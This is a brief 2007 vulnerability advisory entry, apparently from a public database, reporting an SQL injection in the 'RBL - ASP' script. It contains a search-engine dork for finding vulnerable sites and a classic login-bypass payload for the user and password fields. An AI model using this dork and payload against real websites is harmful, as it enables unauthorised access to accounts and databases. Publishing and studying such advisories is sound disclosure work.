RBL - ASP (scripts with db) SQL injection

2007-01-30T00:00:00
ID SECURITYVULNS:DOC:15910
Type securityvulns
Reporter Securityvulns
Modified 2007-01-30T00:00:00

Description

  • RBL - ASP (scripts with db) SQL injection

  • By : sn0oPy

  • Risk : high

  • Site : http://www.aspside.com

  • Dork : intitle:"RBL - ASP"

  • exploit :

user = 'or' '=' pass = 'or' '='

  • contact : sn0oPy@avenir-geopolitique.net

  • greetz : [subzero], Avg Team(http://forums.avenir-geopolitique.net)

reference = http://forums.avenir-geopolitique.net/viewtopic.php?t=2607